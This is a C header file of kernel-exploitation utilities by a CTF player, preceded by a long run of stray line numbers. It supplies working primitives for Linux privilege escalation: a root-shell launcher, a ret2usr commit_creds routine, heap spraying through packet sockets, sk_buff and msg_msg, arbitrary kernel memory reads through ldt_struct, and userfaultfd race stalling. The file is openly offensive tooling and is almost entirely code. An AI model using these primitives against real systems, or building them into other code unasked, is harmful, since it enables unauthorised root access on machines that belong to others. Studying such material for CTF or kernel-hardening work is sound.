330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
1001
1002
1003
1004
1005
1006
1007
1008
1009
1010
1011
1012
1013
1014
1015
1016
1017
1018
1019
1020
1021
1022
1023
1024
1025
1026
1027
1028
1029
1030
1031
1032
1033
1034
1035
1036
1037
1038
1039
1040
1041
1042
1043
1044
1045
1046
1047
1048
1049
/**
* @file kernel.h
* @author arttnba3 (arttnba@gmail.com)
* @brief arttnba3's personal utils for kernel pwn
* @version 1.1
* @date 2023-05-20
*
* @copyright Copyright (c) 2023 arttnba3
*
*/
#ifndef A3_KERNEL_PWN_H
#define A3_KERNEL_PWN_H

#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif

#include <sys/types.h>
#include <stdio.h>
#include <pthread.h>
#include <errno.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <poll.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sys/sem.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/wait.h>
#include <semaphore.h>
#include <poll.h>
#include <sched.h>
#include <linux/if_packet.h>
#include <linux/if_ether.h>

/**
* I - fundamental functions
* e.g. CPU-core binder, user-status saver, etc.
*/

size_t kernel_base = 0xffffffff81000000, kernel_offset = 0;
size_t page_offset_base = 0xffff888000000000, vmemmap_base = 0xffffea0000000000;
size_t init_task, init_nsproxy, init_cred;

size_t direct_map_addr_to_page_addr(size_t direct_map_addr)
{
size_t page_count;

page_count = ((direct_map_addr & (~0xfff)) - page_offset_base) / 0x1000;

return vmemmap_base + page_count * 0x40;
}

int print_hex(void *p, int size){
int i;
unsigned char *buf = (unsigned char *)p;

if(size % sizeof(void *))
{
return 1;
}
printf("--------------------------------------------------------------------------------\n");
for (i = 0; i < size; i += sizeof(void *)){
printf("0x%04x : %02X %02X %02X %02X %02X %02X %02X %02X 0x%lx\n",
i, buf[i+0], buf[i+1], buf[i+2], buf[i+3], buf[i+4], buf[i+5], buf[i+6], buf[i+7], *(unsigned long*)&buf[i]);
}
return 0;
}

void err_exit(char *msg)
{
printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);
sleep(5);
exit(EXIT_FAILURE);
}

/* root checker and shell poper */
void get_root_shell(void)
{
puts("[*] Checking for root...");

if(getuid()) {
puts("\033[31m\033[1m[x] Failed to get the root!\033[0m");
sleep(5);
exit(EXIT_FAILURE);
}

puts("\033[32m\033[1m[+] Successful to get the root. \033[0m");
puts("\033[34m\033[1m[*] Execve root shell now...\033[0m");

system("/bin/sh");

/* to exit the process normally, instead of segmentation fault */
exit(EXIT_SUCCESS);
}

/* userspace status saver */
size_t user_cs, user_ss, user_rflags, user_sp;
void save_status()
{
asm volatile (
"mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
);
puts("\033[34m\033[1m[*] Status has been saved.\033[0m");
}

/* bind the process to specific core */
void bind_core(int core)
{
cpu_set_t cpu_set;

CPU_ZERO(&cpu_set);
CPU_SET(core, &cpu_set);
sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);

printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}

/* for ret2usr attacker */
void get_root_privilige(size_t prepare_kernel_cred, size_t commit_creds)
{
void *(*prepare_kernel_cred_ptr)(void *) =
(void *(*)(void*)) prepare_kernel_cred;
int (*commit_creds_ptr)(void *) = (int (*)(void*)) commit_creds;
(*commit_creds_ptr)((*prepare_kernel_cred_ptr)(NULL));
}

/**
* @brief create an isolate namespace
* note that the caller **SHOULD NOT** be used to get the root, but an operator
* to perform basic exploiting operations in it only
*/
void unshare_setup(void)
{
char edit[0x100];
int tmp_fd;

unshare(CLONE_NEWNS | CLONE_NEWUSER | CLONE_NEWNET);

tmp_fd = open("/proc/self/setgroups", O_WRONLY);
write(tmp_fd, "deny", strlen("deny"));
close(tmp_fd);

tmp_fd = open("/proc/self/uid_map", O_WRONLY);
snprintf(edit, sizeof(edit), "0 %d 1", getuid());
write(tmp_fd, edit, strlen(edit));
close(tmp_fd);

tmp_fd = open("/proc/self/gid_map", O_WRONLY);
snprintf(edit, sizeof(edit), "0 %d 1", getgid());
write(tmp_fd, edit, strlen(edit));
close(tmp_fd);
}

/**
* II - fundamental kernel structures
* e.g. list_head
*/
struct list_head {
uint64_t next;
uint64_t prev;
};

/**
* III - pgv pages sprayer related
* not that we should create two process:
* - the parent is the one to send cmd and get root
* - the child creates an isolate userspace by calling unshare_setup(),
* receiving cmd from parent and operates it only
*/
#define PGV_PAGE_NUM 1000
#define PACKET_VERSION 10
#define PACKET_TX_RING 13

/* each allocation is (size * nr) bytes, aligned to PAGE_SIZE */
struct pgv_page_request {
int idx;
int cmd;
unsigned int size;
unsigned int nr;
};

/* operations type */
enum {
CMD_ALLOC_PAGE,
CMD_FREE_PAGE,
CMD_EXIT,
};

/* pipe for cmd communication */
int cmd_pipe_req[2], cmd_pipe_reply[2];

/* create a socket and alloc pages, return the socket fd */
int create_socket_and_alloc_pages(unsigned int size, unsigned int nr)
{
/* tpacket version for setsockopt */
struct tpacket_req req;
int socket_fd, version;
int ret;

socket_fd = socket(AF_PACKET, SOCK_RAW, PF_PACKET);
if (socket_fd < 0) {
printf("[x] failed at socket(AF_PACKET, SOCK_RAW, PF_PACKET)\n");
ret = socket_fd;
goto err_out;
}

version = TPACKET_V1;
ret = setsockopt(socket_fd, SOL_PACKET, PACKET_VERSION,
&version, sizeof(version));
if (ret < 0) {
printf("[x] failed at setsockopt(PACKET_VERSION)\n");
goto err_setsockopt;
}

memset(&req, 0, sizeof(req));
req.tp_block_size = size;
req.tp_block_nr = nr;
req.tp_frame_size = 0x1000;
req.tp_frame_nr = (req.tp_block_size * req.tp_block_nr) / req.tp_frame_size;

ret = setsockopt(socket_fd, SOL_PACKET, PACKET_TX_RING, &req, sizeof(req));
if (ret < 0) {
printf("[x] failed at setsockopt(PACKET_TX_RING)\n");
goto err_setsockopt;
}

return socket_fd;

err_setsockopt:
close(socket_fd);
err_out:
return ret;
}

int packet_socket_setup(uint32_t block_size, uint32_t frame_size,
uint32_t block_nr, uint32_t sizeof_priv, int timeout) {
int s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
if (s < 0)
{
perror("[-] socket (AF_PACKET)");
exit(1);
}

int v = TPACKET_V3;
int rv = setsockopt(s, SOL_PACKET, PACKET_VERSION, &v, sizeof(v));
if (rv < 0)
{
perror("[-] setsockopt (PACKET_VERSION)");
exit(1);
}

struct tpacket_req3 req3;
memset(&req3, 0, sizeof(req3));
req3.tp_sizeof_priv = sizeof_priv;
req3.tp_block_nr = block_nr;
req3.tp_block_size = block_size;
req3.tp_frame_size = frame_size;
req3.tp_frame_nr = (block_size * block_nr) / frame_size;
req3.tp_retire_blk_tov = timeout;
req3.tp_feature_req_word = 0;

rv = setsockopt(s, SOL_PACKET, PACKET_RX_RING, &req3, sizeof(req3));
if (rv < 0)
{
perror("[-] setsockopt (PACKET_RX_RING)");
exit(1);
}

struct sockaddr_ll sa;
memset(&sa, 0, sizeof(sa));
sa.sll_family = PF_PACKET;
sa.sll_protocol = htons(ETH_P_ALL);
sa.sll_ifindex = if_nametoindex("lo");
sa.sll_hatype = 0;
sa.sll_halen = 0;
sa.sll_pkttype = 0;
sa.sll_halen = 0;

rv = bind(s, (struct sockaddr *)&sa, sizeof(sa));
if (rv < 0)
{
perror("[-] bind (AF_PACKET)");
exit(1);
}

return s;
}

/* the parent process should call it to send command of allocation to child */
int alloc_page(int idx, unsigned int size, unsigned int nr)
{
struct pgv_page_request req = {
.idx = idx,
.cmd = CMD_ALLOC_PAGE,
.size = size,
.nr = nr,
};
int ret;

write(cmd_pipe_req[1], &req, sizeof(struct pgv_page_request));
read(cmd_pipe_reply[0], &ret, sizeof(ret));

return ret;
}

/* the parent process should call it to send command of freeing to child */
int free_page(int idx)
{
struct pgv_page_request req = {
.idx = idx,
.cmd = CMD_FREE_PAGE,
};
int ret;

write(cmd_pipe_req[1], &req, sizeof(req));
read(cmd_pipe_reply[0], &ret, sizeof(ret));

return ret;
}

/* the child, handler for commands from the pipe */
void spray_cmd_handler(void)
{
struct pgv_page_request req;
int socket_fd[PGV_PAGE_NUM];
int ret;

/* create an isolate namespace*/
unshare_setup();

/* handler request */
do {
read(cmd_pipe_req[0], &req, sizeof(req));

if (req.cmd == CMD_ALLOC_PAGE) {
ret = create_socket_and_alloc_pages(req.size, req.nr);
socket_fd[req.idx] = ret;
} else if (req.cmd == CMD_FREE_PAGE) {
ret = close(socket_fd[req.idx]);
} else {
printf("[x] invalid request: %d\n", req.cmd);
}

write(cmd_pipe_reply[1], &ret, sizeof(ret));
} while (req.cmd != CMD_EXIT);
}

/* init pgv-exploit subsystem :) */
void prepare_pgv_system(void)
{
/* pipe for pgv */
pipe(cmd_pipe_req);
pipe(cmd_pipe_reply);

/* child process for pages spray */
if (!fork()) {
spray_cmd_handler();
}
}

/**
* IV - keyctl related
*/

/**
* The MUSL also doesn't contain `keyctl.h` :(
* Luckily we just need a bit of micros in exploitation,
* so just define them directly is okay :)
*/

#define KEY_SPEC_PROCESS_KEYRING -2 /* - key ID for process-specific keyring */
#define KEYCTL_UPDATE 2 /* update a key */
#define KEYCTL_REVOKE 3 /* revoke a key */
#define KEYCTL_UNLINK 9 /* unlink a key from a keyring */
#define KEYCTL_READ 11 /* read a key or keyring's contents */

int key_alloc(char *description, void *payload, size_t plen)
{
return syscall(__NR_add_key, "user", description, payload, plen,
KEY_SPEC_PROCESS_KEYRING);
}

int key_update(int keyid, void *payload, size_t plen)
{
return syscall(__NR_keyctl, KEYCTL_UPDATE, keyid, payload, plen);
}

int key_read(int keyid, void *buffer, size_t buflen)
{
return syscall(__NR_keyctl, KEYCTL_READ, keyid, buffer, buflen);
}

int key_revoke(int keyid)
{
return syscall(__NR_keyctl, KEYCTL_REVOKE, keyid, 0, 0, 0);
}

int key_unlink(int keyid)
{
return syscall(__NR_keyctl, KEYCTL_UNLINK, keyid, KEY_SPEC_PROCESS_KEYRING);
}

/**
* V - sk_buff spraying related
* note that the sk_buff's tail is with a 320-bytes skb_shared_info
*/
#define SOCKET_NUM 8
#define SK_BUFF_NUM 128

/**
* socket's definition should be like:
* int sk_sockets[SOCKET_NUM][2];
*/

int init_socket_array(int sk_socket[SOCKET_NUM][2])
{
/* socket pairs to spray sk_buff */
for (int i = 0; i < SOCKET_NUM; i++) {
if (socketpair(AF_UNIX, SOCK_STREAM, 0, sk_socket[i]) < 0) {
printf("[x] failed to create no.%d socket pair!\n", i);
return -1;
}
}

return 0;
}

int spray_sk_buff(int sk_socket[SOCKET_NUM][2], void *buf, size_t size)
{
for (int i = 0; i < SOCKET_NUM; i++) {
for (int j = 0; j < SK_BUFF_NUM; j++) {
if (write(sk_socket[i][0], buf, size) < 0) {
printf("[x] failed to spray %d sk_buff for %d socket!", j, i);
return -1;
}
}
}

return 0;
}

int free_sk_buff(int sk_socket[SOCKET_NUM][2], void *buf, size_t size)
{
for (int i = 0; i < SOCKET_NUM; i++) {
for (int j = 0; j < SK_BUFF_NUM; j++) {
if (read(sk_socket[i][1], buf, size) < 0) {
puts("[x] failed to received sk_buff!");
return -1;
}
}
}

return 0;
}

/**
* VI - msg_msg related
*/

#ifndef MSG_COPY
#define MSG_COPY 040000
#endif

struct msg_msg {
struct list_head m_list;
uint64_t m_type;
uint64_t m_ts;
uint64_t next;
uint64_t security;
};

struct msg_msgseg {
uint64_t next;
};

/*
struct msgbuf {
long mtype;
char mtext[0];
};
*/

int get_msg_queue(void)
{
return msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
}

ssize_t read_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
return msgrcv(msqid, msgp, msgsz, msgtyp, 0);
}

/**
* the msgp should be a pointer to the `struct msgbuf`,
* and the data should be stored in msgbuf.mtext
*/
ssize_t write_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
((struct msgbuf*)msgp)->mtype = msgtyp;
return msgsnd(msqid, msgp, msgsz, 0);
}

/* for MSG_COPY, `msgtyp` means to read no.msgtyp msg_msg on the queue */
ssize_t peek_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
return msgrcv(msqid, msgp, msgsz, msgtyp,
MSG_COPY | IPC_NOWAIT | MSG_NOERROR);
}

void build_msg(struct msg_msg *msg, uint64_t m_list_next, uint64_t m_list_prev,
uint64_t m_type, uint64_t m_ts, uint64_t next, uint64_t security)
{
msg->m_list.next = m_list_next;
msg->m_list.prev = m_list_prev;
msg->m_type = m_type;
msg->m_ts = m_ts;
msg->next = next;
msg->security = security;
}

/**
* VII - ldt_struct related
*/

/**
* Somethings we may want to compile the exp binary with MUSL-GCC, which
* doesn't contain the `asm/ldt.h` file.
* As the file is small, I copy that directly to here :)
*/

/* Maximum number of LDT entries supported. */
#define LDT_ENTRIES 8192
/* The size of each LDT entry. */
#define LDT_ENTRY_SIZE 8

#ifndef __ASSEMBLY__
/*
* Note on 64bit base and limit is ignored and you cannot set DS/ES/CS
* not to the default values if you still want to do syscalls. This
* call is more for 32bit mode therefore.
*/
struct user_desc {
unsigned int entry_number;
unsigned int base_addr;
unsigned int limit;
unsigned int seg_32bit:1;
unsigned int contents:2;
unsigned int read_exec_only:1;
unsigned int limit_in_pages:1;
unsigned int seg_not_present:1;
unsigned int useable:1;
#ifdef __x86_64__
/*
* Because this bit is not present in 32-bit user code, user
* programs can pass uninitialized values here. Therefore, in
* any context in which a user_desc comes from a 32-bit program,
* the kernel must act as though lm == 0, regardless of the
* actual value.
*/
unsigned int lm:1;
#endif
};

#define MODIFY_LDT_CONTENTS_DATA 0
#define MODIFY_LDT_CONTENTS_STACK 1
#define MODIFY_LDT_CONTENTS_CODE 2

#endif /* !__ASSEMBLY__ */

/* this should be referred to your kernel */
#define SECONDARY_STARTUP_64 0xffffffff81000060

/* desc initializer */
static inline void init_desc(struct user_desc *desc)
{
/* init descriptor info */
desc->base_addr = 0xff0000;
desc->entry_number = 0x8000 / 8;
desc->limit = 0;
desc->seg_32bit = 0;
desc->contents = 0;
desc->limit_in_pages = 0;
desc->lm = 0;
desc->read_exec_only = 0;
desc->seg_not_present = 0;
desc->useable = 0;
}

/**
* @brief burte-force hitting page_offset_base by modifying ldt_struct
*
* @param ldt_cracker function to make the ldt_struct modifiable
* @param cracker_args args of ldt_cracker
* @param ldt_momdifier function to modify the ldt_struct->entries
* @param momdifier_args args of ldt_momdifier
* @param burte_size size of each burte-force hitting
* @return size_t address of page_offset_base
*/
size_t ldt_guessing_direct_mapping_area(void *(*ldt_cracker)(void*),
void *cracker_args,
void *(*ldt_momdifier)(void*, size_t),
void *momdifier_args,
uint64_t burte_size)
{
struct user_desc desc;
uint64_t page_offset_base = 0xffff888000000000;
uint64_t temp;
char *buf;
int retval;

/* init descriptor info */
init_desc(&desc);

/* make the ldt_struct modifiable */
ldt_cracker(cracker_args);
syscall(SYS_modify_ldt, 1, &desc, sizeof(desc));

/* leak kernel direct mapping area by modify_ldt() */
while(1) {
ldt_momdifier(momdifier_args, page_offset_base);
retval = syscall(SYS_modify_ldt, 0, &temp, 8);
if (retval > 0) {
break;
}
else if (retval == 0) {
printf("[x] no mm->context.ldt!");
page_offset_base = -1;
break;
}
page_offset_base += burte_size;
}

return page_offset_base;
}

/**
* @brief read the contents from a specific kernel memory.
* Note that we should call ldtGuessingDirectMappingArea() firstly,
* and the function should be used in that caller process
*
* @param ldt_momdifier function to modify the ldt_struct->entries
* @param momdifier_args args of ldt_momdifier
* @param addr address of kernel memory to read
* @param res_buf buf to be written the data from kernel memory
*/
void ldt_arbitrary_read(void *(*ldt_momdifier)(void*, size_t),
void *momdifier_args, size_t addr, char *res_buf)
{
static char buf[0x8000];
struct user_desc desc;
uint64_t temp;
int pipe_fd[2];

/* init descriptor info */
init_desc(&desc);

/* modify the ldt_struct->entries to addr */
ldt_momdifier(momdifier_args, addr);

/* read data by the child process */
pipe(pipe_fd);
if (!fork()) {
/* child */
syscall(SYS_modify_ldt, 0, buf, 0x8000);
write(pipe_fd[1], buf, 0x8000);
exit(0);
} else {
/* parent */
wait(NULL);
read(pipe_fd[0], res_buf, 0x8000);
}

close(pipe_fd[0]);
close(pipe_fd[1]);
}

/**
* @brief seek specific content in the memory.
* Note that we should call ldtGuessingDirectMappingArea() firstly,
* and the function should be used in that caller process
*
* @param ldt_momdifier function to modify the ldt_struct->entries
* @param momdifier_args args of ldt_momdifier
* @param page_offset_base the page_offset_base we leakked before
* @param mem_finder your own function to search on a 0x8000-bytes buf.
* It should be like `size_t func(void *args, char *buf)` and the `buf`
* is where we store the data from kernel in ldt_seeking_memory().
* The return val should be the offset of the `buf`, `-1` for failure
* @param finder_args your own function's args
* @return size_t kernel addr of content to find, -1 for failure
*/
size_t ldt_seeking_memory(void *(*ldt_momdifier)(void*, size_t),
void *momdifier_args, uint64_t page_offset_base,
size_t (*mem_finder)(void*, char *), void *finder_args)
{
static char buf[0x8000];
size_t search_addr, result_addr = -1, offset;

search_addr = page_offset_base;

while (1) {
ldt_arbitrary_read(ldt_momdifier, momdifier_args, search_addr, buf);

offset = mem_finder(finder_args, buf);
if (offset != -1) {
result_addr = search_addr + offset;
break;
}

search_addr += 0x8000;
}

return result_addr;
}

/**
* VIII - userfaultfd related code
*/

/**
* The MUSL also doesn't contain `userfaultfd.h` :(
* Luckily we just need a bit of micros in exploitation,
* so just define them directly is okay :)
*/

#define UFFD_API ((uint64_t)0xAA)
#define _UFFDIO_REGISTER (0x00)
#define _UFFDIO_COPY (0x03)
#define _UFFDIO_API (0x3F)

/* userfaultfd ioctl ids */
#define UFFDIO 0xAA
#define UFFDIO_API _IOWR(UFFDIO, _UFFDIO_API, \
struct uffdio_api)
#define UFFDIO_REGISTER _IOWR(UFFDIO, _UFFDIO_REGISTER, \
struct uffdio_register)
#define UFFDIO_COPY _IOWR(UFFDIO, _UFFDIO_COPY, \
struct uffdio_copy)

/* read() structure */
struct uffd_msg {
uint8_t event;

uint8_t reserved1;
uint16_t reserved2;
uint32_t reserved3;

union {
struct {
uint64_t flags;
uint64_t address;
union {
uint32_t ptid;
} feat;
} pagefault;

struct {
uint32_t ufd;
} fork;

struct {
uint64_t from;
uint64_t to;
uint64_t len;
} remap;

struct {
uint64_t start;
uint64_t end;
} remove;

struct {
/* unused reserved fields */
uint64_t reserved1;
uint64_t reserved2;
uint64_t reserved3;
} reserved;
} arg;
} __attribute__((packed));

#define UFFD_EVENT_PAGEFAULT 0x12

struct uffdio_api {
uint64_t api;
uint64_t features;
uint64_t ioctls;
};

struct uffdio_range {
uint64_t start;
uint64_t len;
};

struct uffdio_register {
struct uffdio_range range;
#define UFFDIO_REGISTER_MODE_MISSING ((uint64_t)1<<0)
#define UFFDIO_REGISTER_MODE_WP ((uint64_t)1<<1)
uint64_t mode;
uint64_t ioctls;
};


struct uffdio_copy {
uint64_t dst;
uint64_t src;
uint64_t len;
#define UFFDIO_COPY_MODE_DONTWAKE ((uint64_t)1<<0)
uint64_t mode;
int64_t copy;
};

//#include <linux/userfaultfd.h>

char temp_page_for_stuck[0x1000];

void register_userfaultfd(pthread_t *monitor_thread, void *addr,
unsigned long len, void *(*handler)(void*))
{
long uffd;
struct uffdio_api uffdio_api;
struct uffdio_register uffdio_register;
int s;

/* Create and enable userfaultfd object */
uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
if (uffd == -1) {
err_exit("userfaultfd");
}

uffdio_api.api = UFFD_API;
uffdio_api.features = 0;
if (ioctl(uffd, UFFDIO_API, &uffdio_api) == -1) {
err_exit("ioctl-UFFDIO_API");
}

uffdio_register.range.start = (unsigned long) addr;
uffdio_register.range.len = len;
uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1) {
err_exit("ioctl-UFFDIO_REGISTER");
}

s = pthread_create(monitor_thread, NULL, handler, (void *) uffd);
if (s != 0) {
err_exit("pthread_create");
}
}

void *uffd_handler_for_stucking_thread(void *args)
{
struct uffd_msg msg;
int fault_cnt = 0;
long uffd;

struct uffdio_copy uffdio_copy;
ssize_t nread;

uffd = (long) args;

for (;;) {
struct pollfd pollfd;
int nready;
pollfd.fd = uffd;
pollfd.events = POLLIN;
nready = poll(&pollfd, 1, -1);

if (nready == -1) {
err_exit("poll");
}

nread = read(uffd, &msg, sizeof(msg));

/* just stuck there is okay... */
sleep(100000000);

if (nread == 0) {
err_exit("EOF on userfaultfd!\n");
}

if (nread == -1) {
err_exit("read");
}

if (msg.event != UFFD_EVENT_PAGEFAULT) {
err_exit("Unexpected event on userfaultfd\n");
}

uffdio_copy.src = (unsigned long long) temp_page_for_stuck;
uffdio_copy.dst = (unsigned long long) msg.arg.pagefault.address &
~(0x1000 - 1);
uffdio_copy.len = 0x1000;
uffdio_copy.mode = 0;
uffdio_copy.copy = 0;
if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1) {
err_exit("ioctl-UFFDIO_COPY");
}

return NULL;
}
}

void register_userfaultfd_for_thread_stucking(pthread_t *monitor_thread,
void *buf, unsigned long len)
{
register_userfaultfd(monitor_thread, buf, len,
uffd_handler_for_stucking_thread);
}


/**
* IX - kernel structures
*/

struct file;
struct file_operations;
struct tty_struct;
struct tty_driver;
struct serial_icounter_struct;
struct ktermios;
struct termiox;
struct seq_operations;

struct seq_file {
char *buf;
size_t size;
size_t from;
size_t count;
size_t pad_until;
loff_t index;
loff_t read_pos;
uint64_t lock[4]; //struct mutex lock;
const struct seq_operations *op;
int poll_event;
const struct file *file;
void *private;
};

struct seq_operations {
void * (*start) (struct seq_file *m, loff_t *pos);
void (*stop) (struct seq_file *m, void *v);
void * (*next) (struct seq_file *m, void *v, loff_t *pos);
int (*show) (struct seq_file *m, void *v);
};

struct tty_operations {
struct tty_struct * (*lookup)(struct tty_driver *driver,
struct file *filp, int idx);
int (*install)(struct tty_driver *driver, struct tty_struct *tty);
void (*remove)(struct tty_driver *driver, struct tty_struct *tty);
int (*open)(struct tty_struct * tty, struct file * filp);
void (*close)(struct tty_struct * tty, struct file * filp);
void (*shutdown)(struct tty_struct *tty);
void (*cleanup)(struct tty_struct *tty);
int (*write)(struct tty_struct * tty,
const unsigned char *buf, int count);
int (*put_char)(struct tty_struct *tty, unsigned char ch);
void (*flush_chars)(struct tty_struct *tty);
int (*write_room)(struct tty_struct *tty);
int (*chars_in_buffer)(struct tty_struct *tty);
int (*ioctl)(struct tty_struct *tty,
unsigned int cmd, unsigned long arg);
long (*compat_ioctl)(struct tty_struct *tty,
unsigned int cmd, unsigned long arg);
void (*set_termios)(struct tty_struct *tty, struct ktermios * old);
void (*throttle)(struct tty_struct * tty);
void (*unthrottle)(struct tty_struct * tty);
void (*stop)(struct tty_struct *tty);
void (*start)(struct tty_struct *tty);
void (*hangup)(struct tty_struct *tty);
int (*break_ctl)(struct tty_struct *tty, int state);
void (*flush_buffer)(struct tty_struct *tty);
void (*set_ldisc)(struct tty_struct *tty);
void (*wait_until_sent)(struct tty_struct *tty, int timeout);
void (*send_xchar)(struct tty_struct *tty, char ch);
int (*tiocmget)(struct tty_struct *tty);
int (*tiocmset)(struct tty_struct *tty,
unsigned int set, unsigned int clear);
int (*resize)(struct tty_struct *tty, struct winsize *ws);
int (*set_termiox)(struct tty_struct *tty, struct termiox *tnew);
int (*get_icount)(struct tty_struct *tty,
struct serial_icounter_struct *icount);
void (*show_fdinfo)(struct tty_struct *tty, struct seq_file *m);
#ifdef CONFIG_CONSOLE_POLL
int (*poll_init)(struct tty_driver *driver, int line, char *options);
int (*poll_get_char)(struct tty_driver *driver, int line);
void (*poll_put_char)(struct tty_driver *driver, int line, char ch);
#endif
const struct file_operations *proc_fops;
};

struct page;
struct pipe_inode_info;
struct pipe_buf_operations;

/* read start from len to offset, write start from offset */
struct pipe_buffer {
struct page *page;
unsigned int offset, len;
const struct pipe_buf_operations *ops;
unsigned int flags;
unsigned long private;
};

struct pipe_buf_operations {
/*
* ->confirm() verifies that the data in the pipe buffer is there
* and that the contents are good. If the pages in the pipe belong
* to a file system, we may need to wait for IO completion in this
* hook. Returns 0 for good, or a negative error value in case of
* error. If not present all pages are considered good.
*/
int (*confirm)(struct pipe_inode_info *, struct pipe_buffer *);

/*
* When the contents of this pipe buffer has been completely
* consumed by a reader, ->release() is called.
*/
void (*release)(struct pipe_inode_info *, struct pipe_buffer *);

/*
* Attempt to take ownership of the pipe buffer and its contents.
* ->try_steal() returns %true for success, in which case the contents
* of the pipe (the buf->page) is locked and now completely owned by the
* caller. The page may then be transferred to a different mapping, the
* most often used case is insertion into different file address space
* cache.
*/
int (*try_steal)(struct pipe_inode_info *, struct pipe_buffer *);

/*
* Get a reference to the pipe buffer.
*/
int (*get)(struct pipe_inode_info *, struct pipe_buffer *);
};

#endif